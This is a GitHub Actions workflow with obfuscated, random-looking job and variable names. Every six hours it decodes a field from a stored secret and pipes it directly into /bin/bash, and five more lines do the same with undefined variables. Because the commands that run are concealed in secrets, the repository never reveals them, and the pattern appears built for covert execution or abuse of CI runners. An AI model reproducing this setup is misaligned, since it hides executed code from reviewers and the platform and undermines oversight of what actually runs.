name: fengshuting6712

on:
  workflow_dispatch:
  schedule:
    - cron: '20 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengshuting6712
        env:
          lu808: ${{ secrets.lu808 }}
        run: |
          echo $lu808 | jq -r .albs7861 | /bin/bash
          echo $c3 | jq -r .bklc9888 | /bin/bash
          echo $xhwo766 | jq -r .ekvs1241 | /bin/bash
          echo $idzl8 | jq -r .ubei1 | /bin/bash
          echo $qklhe67142 | jq -r .fdyey39129 | /bin/bash
          echo $fgj39 | jq -r .qb59 | /bin/bash

